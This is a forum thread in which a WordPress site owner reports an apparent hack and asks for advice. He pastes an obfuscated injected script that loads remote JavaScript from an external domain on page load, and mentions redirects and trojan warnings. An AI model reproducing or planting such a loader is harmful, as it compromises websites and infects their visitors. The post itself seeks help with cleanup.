site hacked?

  • roner77

    (@roner77)


    16 years, 5 months ago

    Last night I checked my site and found the headers error. I fixed the file as somehow a line was added to the bottom of the my default-filters file. It worked and I thought things were fine. This morning I checked the site and there a was strange gap at the bottom of my footer. I tried to log in to the admin but received another headers already sent error. I checked the source and saw a strange script. I fixed the headers and no longer see the script. This was the script I saw:

    <script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement(‘s&(!$c@(r&@@(i(&^p^&t!’.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ”));N093zwnmmc31lmu.setAttribute(‘type’, ‘text/javascript’);N093zwnmmc31lmu.setAttribute(‘src’, ‘h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^(v!#)i&#e#w!@@()h$&!&o#(@$m)&e^s@!a&$$#l$e#.!r(u@)#:)!8)!0^8#0$@^/$g^^$o#!$o!&)g!l@$e(.$$c@!&@o!$@m$/#g#(o!o@#g$$l!@)e$(.$c#(o(m^@/!)m#((a@#$$p^q#!u&!!)e&&)!s!)(t$&).&c$#&o#^m##/^&v#e&r^@!!i!z#o#!n&.$#n#^e$()t(!/#b@#r)a#m!j@^#))n#^e$^^^t^.&c$)o)!!m!$/))’.replace(/#|\(|&|\)|\$|@|\^|\!/ig, ”));N093zwnmmc31lmu.setAttribute(‘defer’, ‘defer’);N093zwnmmc31lmu.setAttribute(‘id’, ‘S!^(@l$!$!j@!(h$!2!$&5^)d^@j#$o!&@r!$(‘.replace(/\!|\)|\$|\^|@|#|&|\(/ig, ”));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script>

    Again, somehow a line was added to the bottom of the script. I fixed it and the site worked again, but now there’s a redirect link showing for a spilt second to partypoker.com or something. It’s too fast for me to read the whole link.

    I went and checked a couple other static sites on my server and now Avast is saying there’s a trojan horse found on all of them.

    I didn’t do anything to any sites in the last two days.

    So…I’ve obviously been hacked. I use hostmonster. Any suggestions?

    I’ve taken the entire WP site and scanned it in AVG. Nothing was found. Since this is on all of my sites, is this a server issue or a WP issue? The host is closed for the holiday today so I can’t contact them.

    Any advice would be greatly appreciated.

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)

The topic ‘site hacked?’ is closed to new replies.